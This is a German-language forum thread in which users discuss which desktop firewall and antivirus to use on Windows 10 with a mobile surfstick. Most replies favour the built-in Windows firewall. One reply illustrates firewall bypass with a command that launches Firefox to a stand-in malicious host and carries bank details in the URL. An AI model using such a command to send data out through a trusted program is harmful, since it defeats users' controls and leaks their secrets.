• Hallo liebe Userinnen und User,

    nach bereits längeren Planungen und Vorbereitungen sind wir nun von vBulletin auf Xenforo umgestiegen. Die Umstellung musste leider aufgrund der Serverprobleme der letzten Tage notgedrungen vorverlegt werden. Das neue Forum ist soweit voll funktionsfähig, allerdings sind noch nicht alle der gewohnten Funktionen vorhanden. Nach Möglichkeit werden wir sie in den nächsten Wochen nachrüsten. Dafür sollte es nun einige der Probleme lösen, die wir in den letzten Tagen, Wochen und Monaten hatten. Auch der Server ist nun potenter als bei unserem alten Hoster, wodurch wir nun langfristig den Tank mit Bytes vollgetankt haben.

    Anfangs mag die neue Boardsoftware etwas ungewohnt sein, aber man findet sich recht schnell ein. Wir wissen, dass ihr alle Gewohnheitstiere seid, aber gebt dem neuen Board eine Chance.
    Sollte etwas der neuen oder auch gewohnten Funktionen unklar sein, könnt ihr den "Wo issn da der Button zu"-Thread im Feedback nutzen. Bugs meldet ihr bitte im Bugtracker, es wird sicher welche geben die uns noch nicht aufgefallen sind. Ich werde das dann versuchen, halbwegs im Startbeitrag übersichtlich zu halten, was an Arbeit noch aussteht.

    Neu ist, dass die Boardsoftware deutlich besser für Mobiltelefone und diverse Endgeräte geeignet ist und nun auch im mobilen Style alle Funktionen verfügbar sind. Am Desktop findet ihr oben rechts sowohl den Umschalter zwischen hellem und dunklem Style. Am Handy ist der Hell-/Dunkelschalter am Ende der Seite. Damit sollte zukünftig jeder sein Board so konfigurieren können, wie es ihm am liebsten ist.


    Die restlichen Funktionen sollten eigentlich soweit wie gewohnt funktionieren. Einfach mal ein wenig damit spielen oder bei Unklarheiten im Thread nachfragen. Viel Spaß im ngb 2.0.

Firewall für Windows gesucht (Desktop-Firewall)

F.L.X

Neu angemeldet

Registriert
25 März 2014
Beiträge
138
Grüß Euch,

für einen Studienkollegen möchte ich fragen,
der eine Desktop-Firewall sucht, weil er mit einem Surfstick (= ohne Router) "unterwegs" ist.

Kann da wer was empfehlen? ( Gdata, Comodo; PcFirewall, sygate, outpost )
• evtl. m. oder separatem Antivirus
• evtl. sogar kostenlos

für
• Windows 10
 

Steeve

Vereinsheimer
Barkeeper

Registriert
15 Juli 2013
Beiträge
41.121
Sehr altes Internetthema, Windows bringt nachwievor auch eine eigene Firewall mitsich, die reicht, Antivir steht auf einem anderen Blatt
 

The_Emperor



Registriert
17 Juli 2013
Beiträge
2.801
Bin momentan mit der TinyWall auf Win10 unterwegs. Ist zwar keine eigene Firewall da sie nur die Windows Firewall verwaltet, erweitert diese jedoch sodass Windows-Dienste und Prozesse ebenfalls blockiert werden. Freigaben gehen über explizites Whitelistening auf Datei oder Prozessebene. Von den im deutschsprachigen Bereich vertretenen Antivirenprogrammen kann man meines Erachtens nehmen was man persönlich lieber hat. Egal ob Avira, Avast, Kaspersky, bei einem namhaften Anbieter sollte man schon bleiben. Die primäre Schutzfunktionen sind sowieso ein AdBlocker (µBlock, AdBlock+, ...) und bei Bedarf ein Scriptblocker (NoScript, µMatrix, ...).
 

virtus

Gehasst

Registriert
24 Apr. 2015
Beiträge
1.689
Ort
AUF DEM MOND
Wozu eine Firewall? Was genau ist das Problem?
Windows hat eine integrierte, sehr gute Firewall.
Softwarefirewalls auf einem kritischen System können für ausgehende Daten umgangen werden. Dazu gibt es reichlich Wege, dass ein Programm, welches Daten nach außen tragen will, aber keine Ports öffnen darf, andere legitimierte Anwendungen dazu missbraucht.
Eingehende Angriffe sollten bei mobilem Internet kein Problem darstellen. In der Regel sitzt man da sowieso hinter NAT und Proxy. In so fern können sowieso keine Ports nach außen ins Internet freigegeben sein.


Über Antivirenprogramme lässt sich streiten, ich halte nichts davon.
 

F.L.X

Neu angemeldet

Registriert
25 März 2014
Beiträge
138
  • Thread Starter Thread Starter
  • #9
Danke Euch, für Eure Ratschläge,

v.a. auch die integrierte zu nutzen.

sicherlich ist es das einfachste und klar, der Aspekt war mir auch vorher schon bewußt:
Windows bremmst sich selbst sicherlich nicht so aus, wie andere Firewall-Programme anderer Produkte, die sich immer zwischen Browser/FTP und Netzwerkkarte klemmen müssen.

dennoch ist es irgendwie besonders bei mir, auch wenn ich dem Betriebbssystem-Hersteller bedingungs-los (:D) vertraue und alles legal erworben habe, ein Ur-Wunsch, selbst den von ihm freigegebenen (oder gerade zu ihm fließenden :P ) Traffic mit einem anderen, unabhängigeren Programm kontrollieren zu können.
Ich glaube, dem Wunsch kann sich niemand entziehen ... Nicht einmal .. Linuxnutzer :D

wenn auch die Vertrauensfrage auch wieder nur ausgelagert wird ...
und technisch neue Bremsen aufgebaut werden....
achja

von daher war meine Hoffnung, daß vielleicht noch jemand was kennt, was man guten Gewissens empfehlen (und auch dann sogar selber einsetzen kann) kann.

soviel zu Firewalls ...

zu AV: Früher galt ja die Regel, nur 1 AV Scanner einzusetzen, da die sich beide ausbremsen oder sogar auch gegenseitig behindern könnten, indem sie sich gegenseitig die Signaturdatenbanken in die Quarantäne schieben könnten :D
 

virtus

Gehasst

Registriert
24 Apr. 2015
Beiträge
1.689
Ort
AUF DEM MOND
Eine Firewall hat nichts mit einem AV Scanner zu tun. Es sind zwei grundlegend unterschiedliche Dinge.
Eines überwacht Programme/ Prozesse auf deinem System, das andere überwacht I/O im Netzwerk.

Virenscanner arbeiten nicht nur mit Signaturdatenbanken. Würden sie sich rein auf Datenbanken stützen, wären 2 oder mehr Scanner wahrscheinlich kein wirkliches Problem. Problematisch wird erst wenn Heuristiken/ Verhaltensanalyse zur Gefahrenerkennung genutzt werden.

Unabhängig davon habe ich ja schon erwähnt, dass eine Desktopfirewall keinen tatsächlichen Nutzen mit sich bringt. Wie gesagt, ein Programm, das nicht mit dem Web kommunizieren kann, kann immer auch ein legitimiertes Programm missbrauchen um darüber Informationen nach außen zu schieben.
Bestes Beispiel ist dein Browser

[src=bash]C:\Program Files (x86)\Mozilla\Firefox\firefox.exe http://boese-seite.hacker/?kontonummer=123456789&pin=12568&tel=+491234-456789[/src]
 

mighty night

Neu angemeldet

Registriert
15 März 2016
Beiträge
148
Ort
Welt
Eine Firewall ist immer nur so sicher wie, das dazugehörige Ruleset, eine Firewall alleine nicht konfiguriert bringt gar nichts, außer das sie den User falscher Sicherheit wiegt!


Ich bin mehr als nur zufrieden mit Outpost Firewall Pro und habe auch ein entsprechendes Ruleset. Virenschutz kommt von Eset (Endpoint Antivirus) und auch damit bin ich mehr als nur zufrieden. Auch dort habe ich entsprechende Regeln konfiguriert.

Mit dieser Kombination kann ich gut Leben und habe dadurch mehr als nur eine 0815 Security.
 
Oben